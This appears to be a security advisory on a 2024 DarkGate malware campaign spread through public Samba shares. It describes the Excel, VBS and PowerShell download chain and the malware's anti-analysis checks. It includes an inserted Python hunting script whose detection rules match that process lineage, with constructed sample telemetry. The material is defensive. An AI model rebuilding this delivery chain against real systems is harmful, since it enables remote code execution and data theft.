Severity
High
Analysis Summary
A brief DarkGate malware campaign that used Samba file shares to spread infections has recently been brought to light by cybersecurity researchers.
According to the researchers, the activity took place between March and April 2024. The infection chains relied on public-facing Samba file shares that hosted JavaScript and Visual Basic Script (VBS) files. Targets were located in North America, Europe, and parts of Asia. Although short-lived, the campaign shows how threat actors can abuse legitimate services to distribute malware.
First observed in 2018, DarkGate has evolved into a malware-as-a-service (MaaS) offering available to a limited number of customers. It can mine cryptocurrency, execute code remotely, take control of compromised hosts, launch reverse shells, and drop additional payloads. DarkGate activity has increased significantly in recent months, particularly since the QakBot infrastructure was taken down by international law enforcement in August 2023.
The campaign begins with Microsoft Excel (.xlsx) files that prompt targets to click an embedded "Open" button, which downloads and launches VBS code hosted on a Samba file share. That VBS code runs a PowerShell script that fetches and executes a second PowerShell script, which in turn downloads an AutoHotKey-based DarkGate package. Alternative chains use JavaScript files instead of VBS to download and execute the same follow-up PowerShell script.
To hinder analysis, DarkGate checks for various anti-malware products and inspects CPU details to determine whether it is running on a physical host or a virtual machine. It also examines the host's running processes for reverse-engineering tools, debuggers, and virtualization software.
DarkGate C2 traffic uses unencrypted HTTP requests, but the data is obfuscated and appears as Base64-encoded text. As DarkGate continues to refine its intrusion and anti-analysis techniques, it is a reminder of the need for comprehensive, proactive cybersecurity defenses.
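One defender-side way to hunt for the execution chain described above, as an added example that is not part of the advisory: walk process-creation telemetry for an Office parent, a script host child, and a PowerShell descendant, and separately flag script hosts loading a script from a UNC (SMB) path. The event fields (pid, ppid, image, cmd) are an assumed, Sysmon-like shape, and the sample events are constructed.

```python
"""Added hunting example, not from the advisory: flag the Excel -> script host ->
PowerShell -> AutoHotkey lineage, and script hosts loading a script from a UNC
path, in process-creation telemetry. Field names are an assumed Sysmon-like shape."""

# Constructed sample telemetry; 203.0.113.10 is a documentation-range address.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Office\EXCEL.EXE", "cmd": "EXCEL.EXE invoice.xlsx"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r"wscript.exe \\203.0.113.10\share\update.vbs"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -c <omitted>"},
    {"pid": 500, "ppid": 400, "image": r"C:\Users\u\AppData\Roaming\AutoHotkey.exe", "cmd": "AutoHotkey.exe a.ahk"},
]
OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def lineage(ev, by_pid):
    """Image basenames from the root ancestor down to ev (cycle-safe)."""
    chain, seen = [], set()
    while ev is not None and ev["pid"] not in seen:
        seen.add(ev["pid"])
        chain.append(basename(ev["image"]))
        ev = by_pid.get(ev["ppid"])
    return chain[::-1]

def office_script_powershell_chains(events):
    """PIDs whose ancestry contains Office -> script host -> PowerShell, in that order."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for ev in events:
        stage = 0
        for name in lineage(ev, by_pid):  # intermediate processes are allowed
            if stage == 0 and name in OFFICE:
                stage = 1
            elif stage == 1 and name in SCRIPT_HOSTS:
                stage = 2
            elif stage == 2 and name in SHELLS:
                stage = 3
        if stage == 3:
            hits.append(ev["pid"])
    return hits

def script_hosts_run_from_unc(events):
    """PIDs of wscript/cscript whose command line references a double-backslash UNC path."""
    return [e["pid"] for e in events
            if basename(e["image"]) in SCRIPT_HOSTS and "\\\\" in e["cmd"]]
```

Because the stage check walks the full ancestry, later stages such as the AutoHotkey process are reported as well as the PowerShell process itself.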
Impact
- Remote Code Execution
- Information Theft
Indicators of Compromise
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Never trust or open links and attachments received from unknown sources/senders.
- Implement multi-factor authentication to add an extra layer of security to login processes.
- Regularly monitor network activity for any unusual behavior, as this may indicate that a cyberattack is underway.
- Organizations need to stay vigilant and follow best practices for cybersecurity to protect their systems and data from potential threats. This includes regularly updating software and implementing strong access controls and monitoring tools.
- Develop a comprehensive incident response plan to respond effectively in case of a security breach or data leakage.
- Maintain regular backups of critical data and systems to ensure data recovery in case of a security incident.
- Adhere to security best practices, including the principle of least privilege, and ensure that users and applications have only the necessary permissions.
- Establish a robust patch management process to ensure that security patches are evaluated, tested, and applied promptly.
- Conduct security audits and assessments to evaluate the overall security posture of your systems and networks.
- Implement network segmentation to contain and isolate potential threats to limit their impact on critical systems.